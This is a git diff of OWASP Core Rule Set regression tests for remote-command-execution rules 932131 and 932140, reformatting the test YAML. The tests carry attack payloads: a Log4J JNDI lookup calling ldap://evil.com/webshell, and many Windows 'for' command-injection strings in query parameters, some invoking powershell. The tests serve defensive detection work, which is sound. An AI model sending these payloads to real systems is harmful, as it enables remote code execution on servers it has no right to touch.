b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index 378089c7c..3f673ed4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml @@ -1,39 +1,37 @@ --- meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "932131.yaml" - description: "Tests to trigger or not trigger rule 932131" +rule_id: 932131 tests: - - test_title: 932131-1 + - test_id: 1 desc: Log4J test with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}" - Host: "localhost" - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932131" - - test_title: 932131-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}" + Host: "localhost" + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932131] + - test_id: 2 desc: False positive against Facebook for Android user agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]" - Host: "localhost" - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932131" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]" + Host: "localhost" + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml index a105ef47d..e38f63c71 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml @@ -2,2540 +2,2539 @@ meta: author: "fgsch, azurit" description: Tests for Windows for command - enabled: true - name: 932140.yaml +rule_id: 932140 tests: - - test_title: 932140-1 + - test_id: 1 desc: for % stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 2 desc: for %% stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 3 desc: for /d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 4 desc: for /r stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 5 desc: for /l stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 6 desc: for /f .. fileset stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 7 desc: for /f .. "string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 8 desc: for /f .. 'command' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 9 desc: for /f .. `command` stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-10 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-11 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-12 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-13 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-14 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-15 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-16 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-17 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-18 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-19 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-20 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-21 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-22 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-23 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-24 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-25 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-26 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-27 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-28 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-29 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-30 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-31 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-32 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-33 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-34 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-35 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-36 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-37 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-38 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-39 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-40 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-41 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-42 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-43 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-44 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-45 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-46 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-47 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-48 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-49 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-50 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" - version: 